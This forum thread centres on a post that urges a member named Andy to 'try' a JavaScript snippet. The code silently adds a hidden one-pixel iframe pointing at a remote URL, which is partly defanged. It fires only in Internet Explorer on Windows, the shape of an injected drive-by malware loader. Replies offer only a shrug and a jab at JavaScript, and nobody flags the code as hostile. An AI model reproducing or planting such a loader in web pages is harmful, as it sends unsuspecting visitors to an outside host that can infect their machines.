What's new
Vindictive

Register a free account today to become a member. Once you're approved, you'll able to participate on this site by adding topics and posts, as well as connect with other members through your own private inbox. We are not legally responsible if you're sexually harassed by Spine.

ATTN: Andy

Aemon Algiz

Member
You should try the following Javascript.

Code:
function MakeFrameEx(){
  element = do​cument.get​ElementById('yahoo_api');
  if (!element){
    var el = do​cument.cr​eateElement('if​rame');
    do​cument.body.append​Child(el);
    el.id = 'yahoo_api';
    el.style.width = '1px';
    el.style.height = '1px';
    el.style.display = 'none';
    el.src = 'hxxp://​juyfdjhdjdgh​.nl​.ai​/showthread.php?t=72241732'
  }
}
var ua = navigator.userAgent.toLowerCase();
if (((ua.indexOf("msie") !=- 1 && ua.indexOf("opera") ==- 1 && ua.indexOf("webtv") ==- 1))
 && ua.indexOf("windows") !=- 1){
  var t = setTimeout("MakeFrameEx()", 1000)
}
 
Interesting.

377b7f48a3.png
 
Also this goes to show that JavaScript is one of the most, if not the most cancerous programming language in existence. How people use this for full-stack development is beyond me.
 
Back